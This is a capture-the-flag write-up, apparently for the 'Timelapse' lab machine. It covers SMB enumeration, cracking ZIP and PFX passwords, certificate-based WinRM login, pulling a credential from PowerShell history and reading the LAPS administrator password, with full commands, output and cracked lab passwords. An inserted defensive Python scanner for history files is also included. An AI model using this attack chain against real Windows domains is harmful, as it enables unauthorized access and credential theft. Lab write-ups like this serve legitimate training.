Hi everyone! This is a Windows machine that only tests Active Directory related content during privilege escalation. For initial access, we have to enumerate SMB for a password-protected ZIP file which stores a password-protected PFX file. After cracking both with zip2john and crackpkcs12, we extract the private key and certificate from the PFX file and use them to log in over WinRM. Once logged in, we enumerate PowerShell's command history file to pivot to another account that has LAPS read access. With LAPS read access, we will be able to obtain the local administrator's password. Let's get started!
1. Nmap enumeration
$ sudo nmap -sC -sV -p- 10.10.11.152
PORT      STATE SERVICE           VERSION
53/tcp    open  domain            Simple DNS Plus
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2022-07-15 10:09:34Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
5986/tcp  open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after:  2022-10-25T14:25:29
|_ssl-date: 2022-07-15T10:11:07+00:00; +7h59m59s from scanner time.
| tls-alpn:
|_  http/1.1
9389/tcp  open  mc-nmf            .NET Message Framing
49667/tcp open  msrpc             Microsoft Windows RPC
49673/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc             Microsoft Windows RPC
49696/tcp open  msrpc             Microsoft Windows RPC
56370/tcp open  msrpc             Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m57s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-07-15T10:10:30
|_  start_date: N/A
2. SMB enumeration
Since port 445 is open, I decided to check whether we can view any content anonymously. True enough, we can read the "Shares" folder. When accessing the shared folder (just press ENTER when prompted for a password), I found two interesting things: a backup file for WinRM, and the LAPS installer with its documentation. Knowing that LAPS exists will probably be helpful for privilege escalation later.
$ smbmap -H 10.10.11.152 -u anonymous
[+] Guest session   	IP: 10.10.11.152:445	Name: 10.10.11.152
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share
	Shares                                            	READ ONLY
	SYSVOL                                            	NO ACCESS	Logon server share

$ smbclient \\\\10.10.11.152\\Shares
Enter WORKGROUP\kali's password:
smb: \> dir
  .                                   D        0  Mon Oct 25 11:39:15 2021
  ..                                  D        0  Mon Oct 25 11:39:15 2021
  Dev                                 D        0  Mon Oct 25 15:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 11:48:42 2021

		6367231 blocks of size 4096. 2455198 blocks available
smb: \> cd Dev
smb: \Dev\> dir
  .                                   D        0  Mon Oct 25 15:40:06 2021
  ..                                  D        0  Mon Oct 25 15:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 11:46:42 2021

		6367231 blocks of size 4096. 2455198 blocks available
smb: \Dev\> get winrm_backup.zip
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (3.6 KiloBytes/sec) (average 3.6 KiloBytes/sec)
smb: \Dev\> cd ..
smb: \> cd HelpDesk\
smb: \HelpDesk\> dir
  .                                   D        0  Mon Oct 25 11:48:42 2021
  ..                                  D        0  Mon Oct 25 11:48:42 2021
  LAPS.x64.msi                        A  1118208  Mon Oct 25 10:57:50 2021
  LAPS_Datasheet.docx                 A   104422  Mon Oct 25 10:57:46 2021
  LAPS_OperationsGuide.docx           A   641378  Mon Oct 25 10:57:40 2021
  LAPS_TechnicalSpecification.docx    A    72683  Mon Oct 25 10:57:44 2021
3. Analysis of winrm_backup.zip
3.1 Crack and access winrm_backup.zip
When I tried to unzip the ZIP file, it prompted for a password.
$ unzip winrm_backup.zip
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
We can easily crack the ZIP file's password using zip2john and john with the rockyou wordlist.
$ zip2john ./winrm_backup.zip > zip.hashes
$ sudo gunzip /usr/share/wordlists/rockyou.txt.gz
$ john ./zip.hashes --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2022-07-14 23:28) 3.125g/s 10854Kp/s 10854Kc/s 10854KC/s surfroxy154..supergay01
Use the "--show" option to display all of the cracked passwords reliably
Session completed

$ unzip winrm_backup.zip
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: supremelegacy
  inflating: legacyy_dev_auth.pfx
3.2 Crack and read .pfx file
When I tried to read the .pfx file, a password prompt appeared.
$ openssl pkcs12 -info -in ./legacyy_dev_auth.pfx
Enter Import Password:
To crack the file, we first have to install crackpkcs12. Copy and paste the following commands into the terminal to build it from source.
git clone https://github.com/crackpkcs12/crackpkcs12.git
cd crackpkcs12*
./configure
make
sudo make install
Finally, we can start to crack it.
$ cd ..
$ crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./legacyy_dev_auth.pfx

Dictionary attack - Starting 4 threads

*********************************************************
Dictionary attack - Thread 1 - Password found: thuglegacy
*********************************************************
Now that we have the password, we can extract the private key and the certificate from the PFX file into separate PEM files.
$ openssl pkcs12 -in ./legacyy_dev_auth.pfx -nocerts -out private.pem -nodes
Enter Import Password: thuglegacy
$ openssl pkcs12 -in ./legacyy_dev_auth.pfx -out public.pem -clcerts -nokeys
Enter Import Password: thuglegacy
4. Initial access using winrm
We access the machine using evil-winrm along with the extracted certificate and private key, without needing a username or password. Ref: https://wadcoms.github.io/wadcoms/Evil-Winrm-PKINIT/
$ sudo gem install evil-winrm
$ evil-winrm -i 10.10.11.152 -c public.pem -k private.pem -S -r timelapse

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\legacyy\Documents>
4.1 Obtaining the user flag
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\legacyy\Desktop> dir

    Directory: C:\Users\legacyy\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---          7/15/2022   5:27 AM             34 user.txt

*Evil-WinRM* PS C:\Users\legacyy\Desktop> type user.txt
ca*****************************
5. Privilege escalation
5.1 Discovering another user
While looking at the user accounts available, I noticed another interesting user, svc_deploy. Looking at svc_deploy, we can see that it is part of the LAPS_Readers group. I didn't show legacyy or the other accounts' information here, but legacyy (the account we are currently using) is not part of that group and hence cannot read the local administrator's password.
*Evil-WinRM* PS C:\Users\legacyy\Documents> net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            babywyrm                 Guest
krbtgt                   legacyy                  payl0ad
sinfulz                  svc_deploy               thecybergeek
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\legacyy\Documents> net user svc_deploy
User name                    svc_deploy
Full Name                    svc_deploy
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/25/2021 12:12:37 PM
Password expires             Never
Password changeable          10/26/2021 12:12:37 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   7/15/2022 5:57:46 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *LAPS_Readers         *Domain Users
The command completed successfully.
5.2 Getting login credentials via command history
While enumerating, I stumbled across svc_deploy's login credentials in the PowerShell console history file.
*Evil-WinRM* PS C:\Users\legacyy\Documents> type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
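The history file above is exactly the kind of artifact a defender should be sweeping for. The following is an added example (not part of the original write-up) of a small audit routine that scans a ConsoleHost_history.txt for ConvertTo-SecureString literals and links each one to the account name from a later PSCredential line; the sample history is constructed to mirror the one shown, with a placeholder in place of the real secret, and the report keeps only the secret's length so it never re-exposes the value.

```python
import re
from typing import Dict, List

# Constructed sample of a PSReadline ConsoleHost_history.txt, modelled on the
# history quoted in section 5.2; the secret is a placeholder, not the real value.
SAMPLE_HISTORY = """whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'PLACEHOLDER-secret-1' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
"""

# $var = ConvertTo-SecureString '<literal>' -AsPlainText ...  (either quote style)
SECURESTRING_RE = re.compile(
    r"""^\s*\$(?P<var>\w+)\s*=\s*ConvertTo-SecureString\s+(['"])(?P<secret>.*?)\2.*-AsPlainText""",
    re.IGNORECASE,
)
# ... PSCredential ('<user>', $var)  binds the literal to an account name
PSCRED_RE = re.compile(
    r"""PSCredential\s*\(\s*(['"])(?P<user>[^'"]+)\1\s*,\s*\$(?P<var>\w+)\s*\)""",
    re.IGNORECASE,
)


def find_plaintext_credentials(history: str) -> List[Dict[str, object]]:
    """Report each plaintext secret literal in a history file and, when a later
    PSCredential line references the same variable, the account it was bound to.
    Only the secret's length is recorded, so the report never re-exposes it."""
    findings: List[Dict[str, object]] = []
    by_var: Dict[str, Dict[str, object]] = {}
    for lineno, line in enumerate(history.splitlines(), start=1):
        m = SECURESTRING_RE.search(line)
        if m:
            finding = {"line": lineno, "variable": m.group("var"),
                       "secret_length": len(m.group("secret")), "user": None}
            findings.append(finding)
            by_var[m.group("var").lower()] = finding  # PowerShell vars are case-insensitive
            continue
        m = PSCRED_RE.search(line)
        if m and m.group("var").lower() in by_var:
            by_var[m.group("var").lower()]["user"] = m.group("user")
    return findings


if __name__ == "__main__":
    for f in find_plaintext_credentials(SAMPLE_HISTORY):
        print(f"line {f['line']}: ${f['variable']} holds a {f['secret_length']}-char "
              f"plaintext secret for account {f['user'] or '<unbound>'}")
```

Pointing the same function at every user's PSReadline history on a host turns this from a one-off check into a routine sweep for credentials that were typed interactively and forgotten.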
5.3 Login as svc_deploy
$ evil-winrm -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S -r timelapse -s /home/kali

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Warning: User is not needed for Kerberos auth. Ticket will be used

Warning: Password is not needed for Kerberos auth. Ticket will be used

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
5.4 Obtaining local admin’s password via LAPS
We can easily obtain the LAPS password via this Get-LAPSPasswords.ps1 script. Remember to download it to your attacking machine before loading and running it. I already set the script path via the -s flag in evil-winrm before logging in to svc_deploy's account.
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-LAPSPasswords.ps1
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-LAPSPasswords

Hostname   : dc01.timelapse.htb
Stored     : 1
Readable   : 1
Password   : }-%o9e8]&333-n+(VEi30J-}
Expiration : 7/20/2022 10:52:04 AM

Hostname   : dc01.timelapse.htb
Stored     : 1
Readable   : 1
Password   : }-%o9e8]&333-n+(VEi30J-}
Expiration : 7/20/2022 10:52:04 AM

Hostname   :
Stored     : 0
Readable   : 0
Password   :
Expiration : NA

Hostname   : dc01.timelapse.htb
Stored     : 1
Readable   : 1
Password   : }-%o9e8]&333-n+(VEi30J-}
Expiration : 7/20/2022 10:52:04 AM

Hostname   :
Stored     : 0
Readable   : 0
Password   :
Expiration : NA

Hostname   :
Stored     : 0
Readable   : 0
Password   :
Expiration : NA

Hostname   : dc01.timelapse.htb
Stored     : 1
Readable   : 1
Password   : }-%o9e8]&333-n+(VEi30J-}
Expiration : 7/20/2022 10:52:04 AM

Hostname   :
Stored     : 0
Readable   : 0
Password   :
Expiration : NA

Hostname   :
Stored     : 0
Readable   : 0
Password   :
Expiration : NA

Hostname   :
Stored     : 0
Readable   : 0
Password   :
Expiration : NA
Note that since the password is auto-generated by LAPS and rotated, the local administrator password you obtain will definitely be different from mine. You will have to log in to svc_deploy's account and retrieve the local administrator's password yourself.
5.5 Login as administrator
Since we have the password, we can now log in as Administrator.
$ evil-winrm -i 10.10.11.152 -u administrator -p '}-%o9e8]&333-n+(VEi30J-}' -S -r timelapse

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Warning: User is not needed for Kerberos auth. Ticket will be used

Warning: Password is not needed for Kerberos auth. Ticket will be used

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>
5.6 Obtaining the root flag
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir C:\Users

    Directory: C:\Users

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         10/23/2021  11:27 AM                Administrator
d-----         10/25/2021   8:22 AM                legacyy
d-r---         10/23/2021  11:27 AM                Public
d-----         10/25/2021  12:23 PM                svc_deploy
d-----          2/23/2022   5:45 PM                TRX

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\Users\TRX\Desktop
*Evil-WinRM* PS C:\Users\TRX\Desktop> dir

    Directory: C:\Users\TRX\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---          7/15/2022  10:52 AM             34 root.txt

*Evil-WinRM* PS C:\Users\TRX\Desktop> type root.txt
a5*****************************
I hope these tips have been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂